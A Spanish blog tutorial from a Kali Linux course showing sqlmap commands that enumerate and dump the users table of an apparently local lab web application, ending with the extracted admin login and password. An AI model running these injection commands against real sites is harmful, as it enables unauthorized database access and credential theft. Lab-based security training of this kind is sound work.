Categorías: [Curso] Kali Linux

Sqlmap en Kali Linux

Introducción

SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable

Instalación

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi

2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd

Eugenio Chaparro

Compartir
Publicado por
Eugenio Chaparro

Entradas recientes

🟢Editar código de un módulo en Dolibarr [04]

🟢Editar código de un módulo en Dolibarr [04]

En este tutorial vamos editar el código de nuestro módulo personas para poder personalizar algunas…

2 meses hace
🟢Crear un sub_módulo en Dolibarr [03]

🟢Crear un sub_módulo en Dolibarr [03]

En este tutorial vamos a crear un sub módulo llamado seguridad que será muy parecido…

2 meses hace
🟢Modificar un módulo en Dolibarr [02]

🟢Modificar un módulo en Dolibarr [02]

En este tutorial aprenderemos a editar el objeto personas del modulo persona que creamos en…

2 meses hace
🟢Constructor de módulos en Dolibarr

🟢Constructor de módulos en Dolibarr

Como mencionamos anteriormente Dolibarr es un proyecto realizado sobre la base de una política clara:…

2 meses hace
🟢Tickets en Dolibarr [19]

🟢Tickets en Dolibarr [19]

Los ticket en dolibarr nos ayudan a comunicar inconveniente en nuestros productos y servicios dentro…

2 meses hace
🟢Agenda en Dolibarr [18]

🟢Agenda en Dolibarr [18]

Las agendas en dolibarr nos ayudan a ver las actividades realizadas en proceso y por…

2 meses hace